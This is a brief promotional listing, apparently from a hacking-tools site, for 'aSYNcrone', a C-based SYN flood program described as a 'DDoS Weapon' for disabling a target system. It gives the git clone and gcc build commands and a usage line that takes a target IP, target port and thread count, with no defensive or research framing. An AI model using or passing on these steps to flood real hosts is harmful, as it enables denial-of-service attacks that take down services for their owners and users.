DoS & DDoS Attacks

aSYNcrone

aSYNcrone is a SYN Flood DDoS Tool. aSYNcrone is a C language based, mulltifunction SYN Flood DDoS Weapon. Disable the destination system by sending a SYN packet intensively to the destination.

Install

git clone https://github.com/fatihsnsy/aSYNcrone.git
cd aSYNcrone
gcc aSYNcrone.c -o aSYNcrone -lpthread -O2

Usage

./aSYNcrone <source port> <target IP> <target port> <thread number>

#ddos

Source: https://github.com/fatihsnsy/a...